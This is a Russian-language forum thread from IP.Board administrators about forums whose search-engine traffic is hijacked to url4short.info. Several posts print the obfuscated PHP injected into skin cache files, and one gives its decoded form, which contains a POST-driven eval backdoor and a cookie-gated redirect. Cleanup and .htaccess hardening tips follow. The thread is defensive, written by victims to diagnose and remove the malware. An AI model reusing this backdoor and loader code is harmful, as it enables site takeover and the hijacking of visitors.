Posted 7 мая, 201410 yr comment_62822 Проблема такая: При переходе на форум freedom-art с поисковиков(к примеру яндекс) перекидывает на _url4short.info/7de422bd (сайт на который льется наш трафик) Перекидывает всего один раз за сессию. Перелопатили все файлы, нечего подозрительного не нашли. Проверяли через хваленный AI-Bolit - тоже напрасно, он нечего не нашел. Для инфы, хостинг у нас не очень - ihc. Вроде бы убирали передаресация, а она все равно появилась, как - не знаем. Подозрение есть на хуки и модули, т.к. их многовато. Просьба помочь, т.к. трафик опять падет. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/ Share on other sites Больше вариантов
7 мая, 201410 yr comment_62823 А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62823 Share on other sites Больше вариантов
7 мая, 201410 yr Author comment_62824 А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего. Хост сказал, что все хорошо, файлов вредоносных нет. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62824 Share on other sites Больше вариантов
7 мая, 201410 yr comment_62835 Хост сказал, что все хорошо, файлов вредоносных нет. Напишите Платону посмотрим что ответит. А дальше видно будет что и как. И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62835 Share on other sites Больше вариантов
8 мая, 201410 yr Author comment_62879 Напишите Платону посмотрим что ответит. А дальше видно будет что и как. И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум. "фридом арт" по этому запросу, т.е. главной страницы, в .htaccess редиректа нет. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62879 Share on other sites Больше вариантов
8 мая, 201410 yr Author comment_62896 <IfModule mod_rewrite.c> Options -MultiViews RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteRule .(jpeg|jpg|gif|png|js)$ /public/404.php [NC,L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> .htacces так выглядит, Платон меня направил туда же, так же попросил сделать, что уже делал) Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62896 Share on other sites Больше вариантов
8 мая, 201410 yr comment_62901 Этот эффект не был ваш сайт, но ваш компьютер - вирус.Смотреть и скачать здесь removal tools Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62901 Share on other sites Больше вариантов
8 мая, 201410 yr comment_62902 что в index.php ? Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62902 Share on other sites Больше вариантов
8 мая, 201410 yr Author comment_62903 что в index.php ? <?php /** * <pre> * Invision Power Services * IP.Board v3.4.5 * Main public executable wrapper. * Set-up and load module to run * Last Updated: $Date: 2013-02-26 08:08:06 -0500 (Tue, 26 Feb 2013) $ * </pre> * * @author $Author: mark $ * @copyright (c) 2001 - 2009 Invision Power Services, Inc. * @license __www.invisionpower.com/company/standards.php#license * @package IP.Board * @link __www.invisionpower.com * @version $Rev: 12025 $ * */ define( 'IPB_THIS_SCRIPT', 'public' ); require_once( './initdata.php' );/*noLibHook*/ require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/ require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/ ipsController::run(); exit(); Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62903 Share on other sites Больше вариантов
8 мая, 201410 yr comment_62905 и либо в initdata.php либо же на форуме шел, и вам его стоит лечить айболитом __revisium.com/ai/ Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62905 Share on other sites Больше вариантов
8 мая, 201410 yr Author comment_62907 и либо в initdata.php либо же на форуме шел, и вам его стоит лечить айболитом __revisium.com/ai/ форум лечили уже им Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=62907 Share on other sites Больше вариантов
23 января, 20159 yr comment_79123 Такая же беда с пациентом 3.4.7 Выпали все странички из яшки. Написал Платону, на что был дан коротенький ответ В данный момент перенаправления происходят на ресурс url4short.info. Когда они будут устранены, страницы сайта вернутся в поиск автоматически. Копнул поиском и нашел таких проблем много. Добавлю сюда для инфы В кэш файл скина skin_global.php, а также и в кэш, расположенный в БД дописывается вот такой код: $k='b2488714339183624a45a9373ae8d945'; $mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq'; $jsa='jEK!u>WQ^CfRP98_%Xwtk&5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6'; $jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@'; $i='#c#'.substr($mds,213,1); $ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css'); Если его декодировать $i='ini_set'; if(function_exists($i)){ $i('display_errors',0); $i('log_errors',0); } if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k]))); $u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']); $f=@parse_url($_SERVER['HTTP_REFERER']); $c=@$f['host']; $r=@preg_match('#live.com|google.|yahoo.|bing.com|yandex.ru|rambler.ru|baidu.#i',$c); $h=$_SERVER['HTTP_HOST']; $b=$this->settings['cookie_id']; $g=$b.'session_id'; $e=$b.'lang_id'; $d=empty($_SERVER['HTTP_X_MOZ']); if(empty($_COOKIE[$e])){ if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){ if($c==$h){ if($d)setcookie($e,'en',time()+36000); $m=substr(md5($h),0,8); print("document.location='__url4short.info/{$m}'"); } exit;} if((!$u)&&$r){$IPBHTML.="";} } Причем стоит обратить внимание, что куки записываются на 10 часов - 36000 секунд. Переходя из поиска к вам на сайт, пациента перекидывает на урл4шот.инфо Через 10 часов куки отваливаются и пациент будет заходить нормально. Решение: Очистить от ЛИШНЕГО кода указанного выше, в файле /cache/skin_cache/cacheid_1/skin_global.php Перестроить все кэши Внешний вид --->Инструменты Надеюсь решение кому то может. Edited 23 января, 20159 yr by pcmist Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=79123 Share on other sites Больше вариантов
3 февраля, 20159 yr comment_79928 У меня такой вариант: $pk='b16e523177731dcebff764b379878e77'; $rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l'; $pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&'; $pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m'; $f='%t%'.substr($rsa,718,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); Найти бы корень зла... Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=79928 Share on other sites Больше вариантов
5 февраля, 20159 yr comment_80110 Пароли менять точно не стоит ни на админа, ни на базу. Один форум ради эксперимента оставил " не защищенным" и смотрю по логам что делают. 1. Они ищут название админки. Сменить название папки в обязательном порядке на 2857258927598275 или подобное. 2. Поставить права 444 на все файлы /cache/skin_cache/cacheid_1/skin_global.php (Во всех папках cacheid_1, cacheid_2 и т.д.) 3. Добавить в папку cache .htaccess со следующим содержанием. #<ipb-protection> <Files ~ "^.*.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)"> Order allow,deny Deny from all </Files> <Files ~ "^.*.(ipb)$"> Header set Content-Disposition attachment </Files> #</ipb-protection> Других вариантов я пока не нашел. Важно, при каких то изменениях со стилями(инструменты очистки, css, перестроении кэша) не забыть вернуть файлуфайлам, права обратно. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=80110 Share on other sites Больше вариантов
18 февраля, 20159 yr comment_81100 У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету. Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам. Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/ Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=81100 Share on other sites Больше вариантов
23 февраля, 20159 yr Author comment_81728 У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету. Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам. Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/ Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=81728 Share on other sites Больше вариантов
23 февраля, 20159 yr comment_81746 Опять что ли дыра? оО Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=81746 Share on other sites Больше вариантов
24 февраля, 20159 yr comment_81765 Опять что ли дыра? оО Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила. скорее всего не "опять", а кто-то забыл старые дыры залатать или просто не успел Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=81765 Share on other sites Больше вариантов
24 февраля, 20159 yr comment_81808 Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. поддержка, аууууууу, поможет кто чем сможет? Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=81808 Share on other sites Больше вариантов
3 марта, 20159 yr comment_82304 в файле /cache/skin_cache/cacheid_1/skin_global.php был найден и удален следующий код: $pk='b5c742b518ce6244a2407ff3dd9c3fcc'; $rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l'; $pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&'; $pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m'; $f='%t%'.substr($rsa,718,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); После чего этот код удаляем и перестраиваем все стили Кеш. Пишем в яндекс чтобы перепроверили сайт. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=82304 Share on other sites Больше вариантов
4 марта, 20159 yr comment_82365 Удалил данные строки из файла и все равно сегодня этот код появился в файле. Как быть? Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=82365 Share on other sites Больше вариантов
22 июня, 20186 yr comment_149124 Добрый день. Проблема актуально на 3.4.6 Убиваю код в файле skinglobal и кэше базы. перестраиваю кэши стиля. Сутки чисто. После, код появляется снова. Как решить проблему, хелп. Link to comment https://ipbmafia.ru/topic/8064-redirekt-sliv-trafika/?&do=findComment&comment=149124 Share on other sites Больше вариантов
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.